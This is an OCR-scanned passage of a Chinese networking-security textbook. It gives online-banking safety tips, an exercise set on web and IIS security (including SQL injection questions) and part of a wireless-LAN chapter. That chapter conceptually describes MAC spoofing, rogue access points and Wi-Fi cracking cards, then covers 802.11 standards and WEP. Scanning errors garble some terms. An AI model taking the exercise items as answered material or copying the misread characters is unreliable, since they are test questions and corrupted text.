(3) 不 要 直接 用 键盘 输入 密码 ,而 是 改 用 软 键盘 。 

(4) 安装 杀毒 软件 并 及 时 升级 病毒 知识 库 和 操作 系统 补丁 ,尤其 是 反 钓鱼 的 安全 工具 。 

(5) 针对 银行 账号 ,要 利用 数字 证 书 来 对 交易 进行 加 密 。 

(6) 登录 银行 网 站 前 ,要 留意 浏览 器 地 址 栏 , 如 果 发 现 网 页 地 址 不 能 修改 ,最 小 化 IE 窗 
口 后 仍 可 看 到 浮 在 桌面 上 的 网 页 地 址 等 现象 .要 立即 关闭 下 窗口 .以免 账 号 密码 等 被 盗 。 

有 关 专 家 建议 网 民 在 网 上 购物 时 需 提 高 警惕 ,不 要 轻信 交易 对 方 以 低 价 或 其 他 理由 发 
送 的 站 外 商品 页 面 、 付 款 页 面 ,妥善 保管 好 自己 的 网 络 账号 和 密码 ,经常 升 级 防 病毒 软件 , 提 
高 计算 机 的 安全 性 。 此 外 ,通过 第 三 方 支付 平台 进行 交易 时 ,安装 必要 的 数字 证 书 和 安全 控 
件 , 可 充分 保障 你 的 账户 与 资金 免 受 木马 和 网 络 钓鱼 的 威胁 。 
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习 题 


一 、 选 择 题 
1. 在 建立 网 站 的 目录 结构 时 ,最 好 的 做 法 是 ( ) 。 
A. 将 所 有 的 文件 最 好 都 放 在 根 目录 下 B. 目录 层次 选 在 3 一 5 层 


C. 按 栏目 内 容 建 立 子 目 录 D. 最 好 使 用 中 文 目 录 
2 ) 是 网 络 通信 中 标志 通信 各 方 身份 信息 的 一 系列 数据 ,提供 一 种 在 Internet 上 
验证 身份 的 方式 。 
A. 数字 认证 B. 数字 证 书 C. 电子 认证 D. 电子 证 书 
3, 提高 正 浏览 器 安全 性 的 措施 不 包括 ( Ys 
A. 禁止 使 用 Cookies B. 禁止 ActiveX 控件 
C. 禁止 使 用 Java 及 活动 脚本 D. 禁止 访问 国外 网 站 


4. 创建 Web 虚拟 目录 的 用 途 是 ( ) 。 
A. 用 来 模拟 主 目录 的 假 文 件 夹 
B. 用 一 个 假 的 目录 来 避免 感染 病毒 
C. 以 一 个 固定 的 别名 来 指向 实际 的 路 径 , 当 主 目录 改变 时 ,相对 用 户 而 言 是 不 变 的 











D. 以 上 都 不 对 
5. HTTPS 是 使 用 以 下 ( ) 协 议 。 
A. SSH B. SET ESSE D. TCP 
二 、 填空 题 
1. 在 IIS 7.0 中 ,提供 的 登录 身份 认证 方式 有 7 种 ,还 可 以 通过 安全 机 制 建 立 
用 户 和 Web 服务 器 之 间 的 加 密 通信 通道 ,确保 所 传递 信息 的 安全 性 ,这 是 一 种 安全 性 更 高 
的 身份 认证 方式 。 
2. IE 浏览 器 定义 了 5 种 访问 Internet 的 安全 级 别 , 从 高 到 低 分 别 是 y 
iS 和 ;另外 ,提供 了 i 和 
4 种 访问 区 域 。 用 户 可 以 根据 需要 ,对 不 同 的 访问 区 域 设置 不 同 的 安全 级 别 。 
3. IIS 的 安全 性 设置 主要 包括 和 
4. Web 站 点 的 默认 端口 号 是 ;FTP 站 点 的 默认 端口 号 是 ,SMTP 服 
务 的 默认 端口 号 是 。 
三 、 简 答题 


1. Web 站 点 的 安全 问题 主要 表现 在 哪 几 个 方面 

2. IIS 的 安全 设置 包括 哪些 方面 ? 

3. 什么 是 CGI? CGI 程序 可 能 以 什么 方式 产生 安全 漏洞 ? 

4. 什么 是 ASP? 有 哪些 常见 的 ASP 安全 漏洞 ? 

5. 什么 是 SQL 注入 ? SQL 注入 的 基本 步骤 一 般 是 怎样 的 ? 

6. Cookie 对 用 户 计算 机 系统 会 产生 伤害 吗 ? 为 什么 说 Cookie 的 存在 对 个 人 隐私 是 一 
种 潜在 的 威胁 ? 

7. 在 正中 如 何 设 置 Cookie、ActiveX 和 Java 的 安全 性 ? 
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【项 目 目标 】 


(1) 熟练 掌握 无 线 网 络 的 基本 概念 、 标 准 。 

(2) 熟练 掌握 无 线 局 域 网 的 接 入 设备 应 用 。 

(3) 掌握 无 线 局 域 网 的 组 网 模式 。 

(4) 掌握 如 何 组 建 Ad-Hoc 模式 无 线 对 等 网 。 

(5) 掌握 如 何 组 建 Infrastructure 模式 无 线 局 域 网 。 
(6) 了 解 无 线 加 密 标准 和 无 线 局 域 网 的 安全 。 


111 项 目 提 出 


张 先 生 家 中 有 多 台 计 算 机 ,包括 台式 计算 机 和 笔记 本 电脑 ,为 了 实现 这 些 计算 机 能 共享 
宽带 上 网 ,并 实现 无 线 连接 , 张 先生 添置 了 一 台 无 线路 由 器 来 实现 这 些 目 标 。 最 近 , 张 先生 
发 觉 上 网 速度 突然 变 得 很 慢 ,为 此 他 疑惑 不 解 ,因为 张 先生 的 无 线路 由 器 明明 设置 过 密码 ， 
应 该 不 会 被 其 他 人 次 用 网 络 。 

后 来 ,经 朋友 检查 发 现 , 张 先生 的 计算 机 的 “网 络 ” 中 突然 多 出 一 个 陌生 的 计算 机 ,网 络 
被 次 用 已 经 成 为 不 争 的 事实 。 朋 友 告 诉 他 ,他 的 无 线 网 络 已 经 被 一 种 称 为 “ 足 网 卡 ” 的 装 徇 
盯 上 了 ,因为 多 了 一 台 计 算 机 共享 他 的 上 网 带宽 ,所 以 上 网 速度 突然 变 慢 。 那 么 ,如 何 保障 
自己 的 无 线 网 络 安全 使 用 呢 ? 本 项 目 将 为 大 家 解决 这 样 的 技术 问题 。 


112 项 目 分 析 


由 于 无 线 局 域 网 自身 的 特点 , 它 的 无 线 网 络 信号 很 容易 被 发 现 。 非 法 入 侵 者 只 需要 给 
计算 机 安装 无 线 网 卡 ,就 可 以 搜索 到 附近 的 无 线 网 络 信息 ,获取 SSID、 信 道 、. 是 否 加 密 等 信 
息 。 很 多 家 用 无 线 网 络 因为 没有 进行 相应 的 安全 设置 ,很 容易 被 和 人 侵 者 侵入 。 更 糟糕 的 是 ， 
由 于 * 蹦 网 卡 ” 的 出 现 , 它 可 以 捕捉 到 方圆 几 公 里 范围 内 的 无 线 网 络 信号 ,而 且 与 其 相配 套 的 
破解 软件 ,会 很 容易 地 破解 简单 的 加 密 方式 ,从 而 获得 网 络 使 用 权 。 

此 外 ,由 于 无 线 局 域 网 不 对 数据 帧 进行 认证 操作 .这样 , 入 侵 者 可 以 通过 欺骗 帧 去 重新 
定向 数据 流 , 搅 乱 ARP 缓存 表 ( 表 里 的 卫 地 址 与 MAC 地 址 是 一 一 对 应 的 )。 入 侵 者 可 以 
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轻易 地 获得 网 络 中 站 点 的 MAC 地 址 ,而 且 可 以 通过 MAC 地 址 修改 工具 来 将 本 机 的 
MAC 地 址 改 为 无 线 局 域 网 合法 的 MAC 地 址 ,或 者 通过 修改 注册 表 来 修改 MAC 地 址 。 

除了 MAC 地 址 欺骗 手段 外 ,入 侵 者 还 可 以 拦截 会 话 帧 来 发 现 无 线 AP 中 存在 的 认证 
漏洞 ,通过 监测 AP 发 出 的 广播 帧 发 现 AP 的 存在 。 可 是 ,由 于 IEEE 802. 11 无 线 网 络 协 
议 并 没有 要 求 AP 必须 证 明 自 己 是 一 个 AP, 所 以 入 侵 者 可 能 会 冒充 一 个 AP 进入 无 线 网 
络 ,然后 进一步 获取 认证 身份 信息 。 


11.3 相关 知识 点 


11.3.1 无 线 局 域 网 基础 


无 线 局 域 网 (wireless local area networks, WLAN) 利用 电磁 波 在 空气 中 发 送 和 接收 
数据 ,而 无 须 线 缆 介 质 。 作 为 传统 有 线 网 络 的 一 种 补充 和 延伸 ,无线 局 域 网 把 个 人 从 办 
公 桌 边 解放 了 出 来 ,使 他 们 可 以 随时 随地 获取 信息 ,提高 了 员工 的 办 公 效 率 。 此 外 ， 
WLAN 还 有 其 他 一 些 优点 。 它 能 够 方便 地 实施 联网 技术 ,因为 WLAN 可 以 便捷 、 迅 速 地 
接纳 新 加 入 的 员工 ,而 不 必 对 网 络 的 用 户 管理 配置 进行 过 多 的 变动 。WLAN 还 可 以 在 有 
线 网 络 布线 困难 的 地 方 比较 容易 实施 ,使 用 WLAN 方案 , 则 不 必 再 实施 打 孔 、. 数 线 等 作 
业 , 因 而 不 会 对 建筑 设施 造成 任何 损害 。 

现在 ,只 要 给 笔记 本 电脑 装 上 一 块 无 线 网 卡 , 不 管 是 在 酒店 .咖啡 馆 的 走廊 里 ,还 是 
出 差 在 外 地 ,都 可 以 摆脱 线 缆 实 现 无 线 宽带 上 网 ,甚至 可 以 在 遥远 的 外 地 进入 自己 公司 
的 内 部 局 域 网 进行 办 公 处 理 或 者 给 下 属 发 出 电子 指令 ,这 在 目前 已 经 普及 了 。 

WLAN 的 数据 传输 速率 现在 已 经 能 够 达到 1Gbps, 传 输 距离 可 远 至 20km 以 上 。 无 
线 局 域 网 是 对 有 线 联网 方式 的 一 种 补充 和 扩展 ,使 网 上 的 计算 机 具有 可 移动 性 ,能 快速 
方便 地 解决 使 用 有 线 方式 不 易 实 现 的 网 络 连通 问题 。 

无 线 局 域 网 具有 以 下 特点 。 

(1) 安装 便捷 。 一 般 而 言 , 在 网 络 建设 中 ,施工 周期 最 长 .对 周边 环境 影响 最 大 的 ,就 
是 网 络 布线 施工 。 在 施工 过 程 中 ,往往 需要 破 墙 据 地 、 穿 线 架 管 。 而 无 线 局 域 网 最 大 的 
优势 就 是 免 去 或 减少 了 网 络 布线 的 工作 量 , 一 般 只 要 安装 一 个 或 多 个 无 线 接 人 点 AP 
(Access Point) 设 备 ,就 可 组 建 覆盖 整个 建筑 或 地 区 的 无 线 局 域 网 。 

(2) 使 用 灵活 。 在 有 线 网 络 中 ,网 络 设 备 的 安放 位 置 受 网 络 信息 点 位 置 的 限制 。 而 
一 旦 无 线 局 域 网 建成 后 ,在 无 线 网 络 的 信和 号 覆盖 区 域内 任何 一 个 位 置 都 可 以 接 入 网 络 。 

(3) 经 济 节约 。 由 于 有 线 网 络 缺 少 灵活 性 ,就 要 求 网 络 规划 者 尽 可 能 地 考虑 未 来 发 
展 的 需要 ,这 往往 会 导致 预 设 大 量 利用 率 较 低 的 信息 点 。 而 一 旦 网 络 的 发 展 超出 了 设计 
规划 ,又 要 花费 较 多 费用 进行 网 络 改造 ,而 无 线 局 域 网 可 以 避免 或 减少 以 上 情况 的 发 生 。 

(4) 易于 扩展 。 无 线 局 域 网 有 多 种 配置 方式 ,能 够 根据 需要 灵活 选择 。 这 样 ,无 线 局 
域 网 就 能 设计 成 从 只 有 几 个 用 户 的 小 型 局 域 网 到 成 千 上 万 用 户 的 大 型 网 络 ,并 且 能 够 提 
供 像 “漫游 "(Roaming) 等 有 线 网 络 无 法 提供 的 特性 。 

由 于 无 线 局 域 网 具有 多 方面 的 优点 ,所 以 发 展 十 分 迅速 。 在 最 近 几 年 里 ,无 线 局 域 
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网 已 经 在 医院 、 商 店 、 工 厂 和 学 校 等 不 适合 网 络 布线 的 场合 得 到 了 广泛 应 用 。 

无 线 网 络 的 出 现 就 是 为 了 解决 有 线 网 络 无 法 克服 的 困难 。 虽 然 无 线 网 络 有 诸多 优 
势 , 但 与 有 线 网 络 相 比 ,无 线 局 域 网 也 有 很 多 不 足 。 无 线 网 络 速率 较 低 、 价 格 较 高 ,因而 
它 主要 面向 有 特定 需求 的 用 户 。 目 前 无 线 局 域 网 还 不 能 完全 脱离 有 线 网 络 ,无 线 网 络 与 
有 线 网 络 是 互补 的 关系 ,而 不 是 竞争 ,更 不 是 代 蔡 。 近 年 来 ,无线 局 域 网 产品 的 价格 逐渐 
下 降 , 相 应 软件 也 逐渐 成 熟 。 此 外 ,无 线 局 域 网 已 能 够 通过 与 广域网 相 结合 的 形式 提供 
移动 互联 网 的 多 媒体 业务 。 相 信 在 未 来 ,无 线 局 域 网 将 以 它 的 高 速 传 输 能 力 和 灵活 性 发 
挥 更 加 重要 的 作用 。 


11.3.2 无 线 局 域 网 标准 


目前 支持 无 线 网 络 的 技术 标准 主要 有 IEEE 802. 11x 系列 标准 、 家 庭 无 线 网 络 技术 、 
蓝牙 技术 等 。 

1. IEEE 802. 11x 系列 标准 

1997 年 6 月 ,IEEE 推出 了 第 一 代 无 线 局 域 网 标准 一 一 IEEE 802. 11。 该 标准 定义 了 
物理 层 和 介质 访问 控制 子 层 (MAC) 的 协议 规范 ,传输 速率 最 高 只 能 达到 2Mbps。 此 后 这 
一 标准 不 断 得 到 补充 和 完善 ,形成 IEEE 802. 11x 系列 标准 。IEEE 802. 11 标准 规定 了 在 
物理 层 上 允许 采用 3 种 传输 技术 : 红外 线 、 跳 频 扩 频 和 直接 序列 扩 频 。 红 外 无 线 数据 传 
输 按 视 距 方 式 传播 ,发 送 点 必须 能 直接 看 到 接收 点 ,中 间 没 有 阻挡 。 红 外 无 线 数据 传输 
技术 主要 有 3 种 : 定向 光束 红外 传输 ,全 方位 红外 传输 和 漫 反 射 红 外 传输 。 

扩 频 通信 是 将 数据 基带 信号 频谱 扩展 几 倍 或 几 十 倍 , 以 牺牲 通信 带宽 为 代价 达到 提 
高 无 线 通信 系统 的 抗 干扰 性 和 安全 性 。 扩 频 技 术 主 要 有 以 下 两 种 。 

(1) 跳 频 扩 频 。 在 跳 频 扩 频 方案 中 ,发 送信 号 频率 按 固 定 的 间隔 从 一 个 频谱 跳 到 另 
一 个 频谱 。 接 收 器 与 发 送 器 同步 跳动 ,从 而 正确 地 接收 信息 。 而 那些 可 能 的 入 侵 者 只 能 
得 到 一 个 无 法 理解 的 标记 。 发 送 器 以 固定 的 间隔 一 次 变换 一 个 发 送 频率 。802. 11 标准 
规定 每 300ms 的 时 间 间 隔 变换 一 次 频率 。 发 送 频率 变换 的 顺序 由 伪 随 机 数 发 生 器 产生 
的 伪 随 机 码 确定 ,发 送 器 和 接收 器 使 用 相同 变换 的 顺序 序列 。 

(2) 直接 序列 扩 频 。 在 直接 序列 扩 频 方案 中 ,输入 数据 信号 进入 一 个 通道 编码 器 并 
产生 一 个 接近 某 中 央 频 谱 的 较 窗 带宽 的 模拟 信号 。 这 个 信号 将 用 一 系列 看 似 随 机 的 数 
字 ( 伪 随机 码 ) 来 进行 调制 ,调制 的 结果 大 大 地 拓宽 了 要 传输 信号 的 带宽 ,因此 称 为 扩 频 
通信 。 在 接收 端 ,使 用 同样 的 伪 随 机 码 来 恢复 原 信号 ,信号 再 进入 通道 解码 器 来 还 原 传 
送 的 数据 。 

1) IEEE 802. 11b 

IEEE 802. 11b 即 Wi-Fi( wireless fidelity, 无 线 相 容 性 认证 ) , 它 利 用 2. 4GHz 的 频段 。 
2. 4GHz 的 ISM(industrial scientific medical) 频段 为 世界 上 绝 大 多 数 国家 通用 ,因此 IEEE 
802. 11b 得 到 了 最 为 广泛 的 应 用 。 它 的 最 大 数据 传输 速率 为 11Mbps, 无 须 直 线 传播 。 在 
动态 速率 转换 时 ,如 果 无 线 信 号 变 差 ,可 将 数据 传输 速率 降低 为 5. 5Mbps、2Mbps 和 
1Mbps。 支 持 的 范围 在 室外 为 300m, 在 办 公 环 境 中 最 长 为 100m。IEEE 802. 11b 是 所 有 
WLAN 标准 演进 的 基石 ,未 来 许多 的 系统 大 都 需要 与 802. 11b 向 后 兼容 。 
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2) IEEE 802. 11a 

IEEE 802. 11a 标准 是 得 到 广泛 应 用 的 IEEE 802. 11b 标准 的 后 续 标准 。 它 工作 在 
5GHz 频段 ,传输 速率 可 达 54Mbps。 由 于 IEEE 802. 11a 工作 在 5GHz 频段 ,因此 它 与 
IEEE 802. 11 IEEE 802. 11b 标准 不 兼容 。 

3) IEEE 802. 11g 

IEEE 802. 11g 是 为 了 提高 传输 速率 而 制定 的 标准 , 它 采 用 2. 4GHz 频段 ,使 用 CCK 
(complementary code keying, 补 码 键 控 ) 技 术 与 IEEE 802. 11b 向 后 兼容 ,同时 它 又 通过 采 
用 OFDM(orthogonal frequency division multiplexing, 正 交 频 分 多 路 复 用 ) 技 术 支 持 高 达 
54Mbps 的 数据 流 。 

4) IEEE 802. 11n 

IEEE 802. 11n 可 以 将 WLAN 的 传输 速率 由 IEEE 802. 11a 及 IEEE 802. 11g 提供 的 
54Mbps, 提 高 到 300Mbps 甚至 高 达 600Mbps。 通 过 应 用 将 MIMO (multiple-input 
multiple-output, 多 进 多 出 ) 与 OFDM 技术 相 结 合 的 MIMO OFDM 技术 ,提高 了 无 线 传输 
质量 ,也 使 传输 速率 得 到 极 大 提升 。 和 以 往 的 IEEE 802. 11 标准 不 同 ,IEEE 802. 11n 协 
议 为 双 频 工作 模式 (包含 2.4GHz 和 5GHz 两 个 工作 频段 ) ,这 样 IEEE 802. 11n 保障 了 与 
以 往 的 IEEE 802. 11b、IEEE 802. 11a、IEEE 802. 11g 标准 兼容 。 

5) IEEE 802. 1lac 

IEEE 802. 11ac 是 在 IEEE 802. 11a 标准 之 上 建立 起 来 的 ,仍然 使 用 IEEE 802. 11a 
的 5GHz 频段 。 不 过 在 通道 的 设置 上 ,IEEE 802. 11ac 将 沿用 IEEE 802. 11n 的 MIMO 技 
术 。IEEE 802. 11ac 每 个 通道 的 工作 频率 将 由 IEEE 802. 11n 的 40MHz, 提升 到 80MHz 
甚至 是 160MHz, 再 加 上 大 约 10% 的 实际 频率 调制 效率 提升 ,最 终 理论 传输 速度 将 由 
IEEE 802. 11n 最 高 的 600Mbps 跃升 至 1Gbps, 足 以 在 一 条 信道 上 同时 传输 多 路 压缩 视 
频 流 。 

6) IEEE 802. 11ad 

IEEE 802. 11ad 主要 用 于 实现 家 庭 内 部 无 线 高 清音 视频 信号 的 传输 ,为 家 庭 多 媒体 
应 用 带 来 更 为 完备 的 高 清 视频 解决 方案 。IEEE 802. 11ad 抛弃 了 拥挤 的 2. 4GHz 和 
5GHz 频段 ,而 是 使 用 高 频 载波 的 60GHz 频谱 。 由 于 60GHz 频谱 在 大 多 数 国 家 有 大 段 的 
频率 可 供 使 用 ,因此 IEEE 802. 11ad 可 以 在 MIMO 技术 的 支持 下 实现 多 信道 的 同时 传 
输 ,而 每 个 信道 的 传输 带宽 都 将 超过 1Gbps。IEEE 802. 11ad 最 大 传输 速率 可 达 7Gbps。 

注意 WirFi 联 盟 是 一 个 非 营利 性 且 独 立 于 厂商 之 外 的 组 织 , 它 将 基于 IEEE 802. 11 
协议 标准 的 技术 品牌 化 。 一 台 基 于 IEEE 802. 11 协议 标准 的 设备 ,需要 经 历 严格 的 测试 
才能 获得 Wi-Fi 认 证 ,所 有 获得 Wi-Fi 认 证 的 设备 之 间 可 进行 交互 ,不管 其 是 否 为 同一 厂 
商 生 产 。 

IEEE 802. 11x 系列 标准 的 工作 频段 和 最 大 传输 速率 如 表 11-1 所 示 。 

2. 家 庭 无 线 网 络 (Home RF) 技 术 

Home RF(home radio frequency) 一 种 专门 为 家 庭 用 户 设 计 的 小 型 无 线 局 域 网 技术 。 
它 是 IEEE 802. 11 与 Dect( 数 字 无 绳 电话 ) 标 准 的 结合 , 旨 在 降低 语音 数据 通信 成 本 。 
Home RF 在 进行 数据 通信 时 ,采用 IEEE 802. 11 标准 中 的 TCP/IP 传输 协议 ;进行 语音 
通信 时 , 则 采用 数字 增强 型 无 绳 通信 标准 。 
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表 11-1 IEEE 802. 11x 系列 标准 的 工作 频段 和 最 大 传输 速率 


























无 线 标准 工作 频段 最 大 传输 速率 

IEEE 802. 11 2.4GHz 2Mbps 

IEEE 802. 11b 2.4GHz 11Mbps 
IEEE 802. 11a 5GHz 54Mbps 
IEEE 802. 11g 2.4GHz 54Mbps 
IEEE 802. 11n 2.4GHz 和 5GHz 600Mbps 
IEEE 802. 1lac 5GHz 1Gbps 

IEEE 802. 11ad 60GHz 7Gbps 











Home RF 的 工作 频率 为 2. 4GHz。 原 来 最 大 数据 传输 速率 为 2Mbps,2000 年 8 月 ， 
美国 联邦 通信 委员 会 (FCC) 批 准 了 Home RF 的 传输 速率 可 以 提高 到 8 一 11Mbps。Home 
RF 可 以 实现 最 多 5 个 设备 之 间 的 互联 。 

3. 蓝牙 技术 

蓝牙 (bluetooth) 技 术 实 际 上 是 一 种 短 距 离 无 线 数字 通信 的 技术 标准 ,工作 在 2.4GHz 
频段 ,最 高 数据 传输 速率 为 1Mbps( 有 效 传输 速率 为 721kbps) ,传输 距离 为 10cm 一 10m， 
通过 增加 发 射 功率 可 达到 100m。 

蓝牙 技术 主要 应 用 于 手机 、 笔 记 本 电脑 等 数字 终端 设备 之 间 的 通信 和 这 些 设备 与 
Internet 的 连接 。 


11.3.3 无 线 局 域 网 接 入 设备 


组 建 无 线 局 域 网 的 设备 主要 包括 无 线 网 卡 、 无 线 访问 接 入 点、 无 线路 由 器 和 天 线 等 ， 
几乎 所 有 的 无 线 网 络 产品 中 都 自 含 无 线 发 射 /接收 功能 。 

1. 无 线 网 卡 

无 线 网 卡 是 无 线 连接 网 络 的 终端 设备 ,其 作用 相当 于 有 线 网 卡 在 有 线 网 络 中 的 作 
用 。 无 线 网 卡 按照 接口 类 型 可 分 为 以 下 几 种 。 

(1) 台式 机 专用 的 PCI 接口 无 线 网 卡 ,如 图 11-1 所 示 。 

(2) 笔记 本 电脑 专用 的 PCMCIA 接口 无 线 网 卡 , 如 图 11-2 所 示 。 





图 11-1 PCI 接 口 无 线 网 卡 图 11-2 PCMCIA 接口 无 线 网 卡 
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(3) 台式 机 和 笔记 本 电脑 均 可 用 的 USB 接口 无 线 网 卡 ,如 图 11-3 所 示 。 
(4) 笔记 本 电脑 内 置 的 MINIPCI 接口 无 线 网 卡 ,如 图 11-4 所 示 。 





时 


图 11-3 USB 接口 无 线 网 卡 图 11-4 MINIPCI 接 口 无 线 网 卡 





2. 无 线 访问 接 入 点 

无 线 访问 接 入 点 (access point, AP) 的 作用 相当 于 局 域 网 中 的 集线器 , 它 在 无 线 局 域 
网 和 有 线 局 域 网 之 间接 收 、 缓 冲 存 储 和 传输 数据 ,以 支持 一 组 无 线 用 户 设备 。 无 线 AP 通 
常 是 通过 标准 以 太 网 线 连 接 到 有 线 网 络 上 ,并 通过 天 线 与 无 线 设备 进行 通信 。 在 有 多 个 
无 线 AP 时 ,用 户 可 以 在 无 线 AP 之 间 漫 游 切 换 。 

无 线 AP 是 移动 计算 机 用 户 进 入 有 线 网 络 的 接 入 点 ,主要 用 于 宽带 家 庭 、 大 楼 内 部 以 
及 园区 内 部 ,典型 传输 距离 为 20 一 500m, 目前 主要 技术 为 IEEE 802. 11x 系列 。 根 据 技 
术 .配置 和 使 用 情况 ,一 个 无 线 AP 可 以 支持 15 一 250 个 用 户 ,通过 添加 更 多 的 无 线 AP， 
可 以 比较 轻松 地 扩充 无 线 局 域 网 ,从 而 减少 网 络 拥塞 并 扩大 网 络 的 覆盖 范围 。 

室内 无 线 AP 如 图 11-5 所 示 。 此 外 ,还 有 用 于 大 楼 之 间 的 联网 通信 的 室外 无 线 AP， 
如 图 11-6 所 示 ,其 典型 传输 距离 为 几 千 米 至 几 十 千 米 , 用 于 为 难以 布线 的 场所 提供 可 靠 、 
便捷 的 网 络 连接 。 





图 11-5 室内 无 线 AP 11-6 室外 无 线 AP 


3. 无 线路 由 器 

无 线路 由 器 (wireless router) 集 成 了 无 线 AP 和 宽带 路 由 器 的 功能 , 它 不 仅 具备 AP 的 
无 线 接 人 功能 ,通常 还 支持 DHCP、 防 火 墙 \WEP 加 密 等 功能 ,而 且 还 包括 了 网 络 地 址 转 
换 (NAT) 功 能 ,可 支持 局 域 网 用 户 的 网 络 连 接 共享 ,可 实现 家 庭 无 线 网 络 中 的 Internet 连 
接 共享 ,实现 ADSL 和 小 区 宽带 的 无 线 共享 接 入 。 
344 


项 目 11 无 线 网 络 安全 | 





无 线路 由 器 可 以 与 ADSL Modem 或 Cable Modem 直接 相连 ,也 可 以 在 使 用 时 通过 交 
换 机 /集线器 、 宽 带路 由 器 等 局 域 网 方式 再 接 入 。 其 内 置 有 简单 的 虚拟 拨号 软件 ,可 以 存 
储 用 户 名 和 密码 ,可 以 为 拨号 接 人 Internet 的 
ADSL .Cable Modem 等 提供 自动 拨号 功能 ,而 无 
须 手 动 拨号 。 此 外 ,无 线路 由 器 一 般 还 具备 相 
对 更 完善 的 安全 防护 功能 。 

绝 大 多 数 无 线 宽带 路 由 器 都 拥有 4 个 LAN 
端口 和 1 个 WAN 端口 ,可 作为 有 线 宽带 路 由 器 
使 用 ,如 图 11-7 所 示 。 图 11-7 无 线路 由 器 

4. 天 线 

在 无 线 网 络 中 ,天 线 可 以 起 到 增强 无 线 信号 的 目的 ,可 以 把 它 理解 为 无 线 信 号 的 放 
大 器 。 天 线 对 空间 不 同方 向 具有 不 同 的 辐射 或 接收 能 力 , 而 根据 方向 性 的 不 同 , 可 将 天 
线 分 为 全 向 天 线 和 定向 天 线 两 种 。 

1) 全 向 天 线 

在 水 平面 上 ,辐射 与 接收 无 最 大 方向 的 天 线 称 为 全 向 天 线 。 全 向 天 线 由 于 无 方向 
性 ,所 以 多 用 在 点 对 多 点 通信 的 中 心 点 。 比 如 想 要 在 相 邻 的 两 由 楼 之 间 建 立 无 线 连 接 ， 
就 可 以 选择 这 类 天 线 , 如 图 11-8 所 示 。 

2) 定向 天 线 

有 一 个 或 多 个 辐射 与 接收 能 力 最 大 方向 的 天 线 称 为 定向 天 线 。 定 向 天 线 能 量 集中 ， 
增益 相对 全 向 天 线 要 高 ,适合 于 远 距 离 点 对 点 通信 ,同时 由 于 具有 方向 性 , 抗 干扰 能 力 比 
较 强 。 比 如 在 一 个 小 区 里 ,需要 横 跨 几 幢 楼 建立 无 线 连接 时 ,就 可 以 选择 这 类 天 线 , 如 
图 11-9 所 示 。 





图 11-8 全 向 天 线 图 11-9 定向 天 线 


11.3.4 无 线 局 域 网 的 组 网 模式 

根据 无 线 局 域 网 的 应 用 环境 与 需求 的 不 同 ,无 线 局 域 网 可 采取 不 同 的 组 网 模式 来 实 
现 互联 。 无 线 局 域 网 组 网 模式 主要 有 两 种 : 一 种 是 无 基站 的 Ad-Hoc( 无 线 对 等 ) 模 式 ; 另 
一 种 是 有 固定 基站 的 infrastructure( 基 础 结构 ) 模 式 。 
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1. Ad-Hoc 模式 


Ad-Hoc 是 一 种 无 线 对 等 网 络 ,是 最 简单 的 无 线 局 域 网 结构 ,是 一 种 无 中 心 拓扑 结 
构 ,网络 连 接 的 计算 机 具有 平等 的 通信 关系 ,适用 于 少量 计算 机 (通常 小 于 5 台 ) 的 无 线 


连接 ,如 图 11-10 所 示 。 任 何 时 候 , 只 要 两 个 或 
多 个 的 无 线 网 络 接口 互相 都 在 彼此 的 无 线 覆 盖 
范围 之 内 ,就 可 建立 一 个 无 线 对 等 网 ,实现 点 对 
点 或 点 对 多 点 连接 。Ad-Hoc 模式 不 需要 固定 设 
施 ,只 需 在 每 台 计 算 机 上 安装 无 线 网 卡 就 可 以 实 
现 ,因此 非常 适合 组 建 临时 性 的 网 络 ,如 时 外 作 
\ 军 事 领 域 等 。 

Ad-Hoc 结构 是 一 种 省 去 了 无 线 AP 而 搭建 
起 来 的 对 等 网 络 结构 ,由 于 省 去 了 无 线 AP， 
Ad-Hoc 无 线 局 域 网 的 网 络 架 设 过程 十 分 简单 。 
不 过 ,一 般 的 无 线 网 卡 在 室内 环境 下 的 有 效 传输 








M AS 
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11-10 Ad-Hoc 模式 无 线 对 等 网 络 


距离 通常 为 40m 左右 , 当 超过 此 有 效 传输 距离 时 ,就 不 能 实现 彼此 之 间 的 通信 。 因 此 ,该 
模式 非常 适合 一 些 简单 甚至 是 临时 性 的 无 线 互联 需求 。 


2. infrastructure 模式 


infrastructure( 基 础 结构 ) 模 式 有 一 个 中 心 无 线 AP, 作 为 固定 基站 ,所 有 站 点 均 与 无 
线 AP 连 接 , 所 有 站 点 对 资源 的 访问 由 无 线 AP 统一 控制 。 基 础 结构 模式 是 无 线 局 域 网 


最 为 普遍 的 组 网 模式 ,网 络 性 能 稳定 、 可 靠 , 并 且 


可 以 连接 一 定数 量 的 用 户 。 通 过 中 心 无 


线 AP, 还 可 以 把 无 线 局 域 网 与 有 线 网 络 连接 起 来 ,如 图 11-11 所 示 。 





由 


图 11-11 Infrastructure 模式 无 线 网 络 


11.3.5 服务 集 标识 SSID 
服务 集 标识 (service set identifier, SSID) 用 来 
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字符 ,无 线 网 卡 设置 了 不 同 的 SSID 就 可 以 进入 不 同 的 无 线 网 络 。SSID 通常 由 AP 广播 
出 来 ,通过 Windows 7 自 带 的 扫描 功能 可 以 查看 当前 区 域内 的 SSID。 出 于 安全 考虑 可 以 
不 广播 SSID, 此 时 用 户 就 要 手工 设置 SSID 才能 进入 相应 的 网 络 。 简 单 地 说 ,SSID 就 是 
一 个 无 线 局 域 网 的 名 称 , 只 有 设置 为 相同 SSID 值 的 计算 机 才能 互相 通信 。 


11.3.6 无 线 加 密 标准 


目前 无 线 加 密 标准 主要 有 WEP、WPA、WPA2 三 种 。 

1. WEP 加 密 标准 

WEP( wired equivalent privacy, 有 线 等 效 保密 ) 是 IEEE 802. 11b 标准 定义 的 一 个 用 于 
无 线 局 域 网 的 安全 性 协议 ,主要 用 于 无 线 局 域 网 业务 流 的 加 密 和 节点 的 认证 ,提供 和 有 
线 局 域 网 相当 的 保密 性 ,而 依 此 命名 的 。 

WEP 定义 了 两 种 身份 验证 的 方法 : 开放 系统 和 共享 密 钥 。 在 默认 的 开放 系统 方法 
中 ,用 户 即 使 没有 提供 正确 的 WEP 密 钥 也 能 接 人 访问 点 ,而 共享 密 钥 方法 则 需要 用 户 提 
供 正 确 的 WEP 密 钥 才 能 通过 身份 验证 。 

WEP 支持 64 位 和 128 位 加 密 。 对 于 64 位 加 密 , 加 密 密 钥 为 10 个 十 六 进 制 字符 或 
5 个 ASCII 字符 ;对 于 128 位 加 密 , 加 密 密 钥 为 26 个 十 六 进 制 字符 或 13 个 ASCI 字符 。 
WEP 依赖 通信 双方 共享 的 密 钥 来 保护 所 传输 的 加 密 数 据 帧 。 

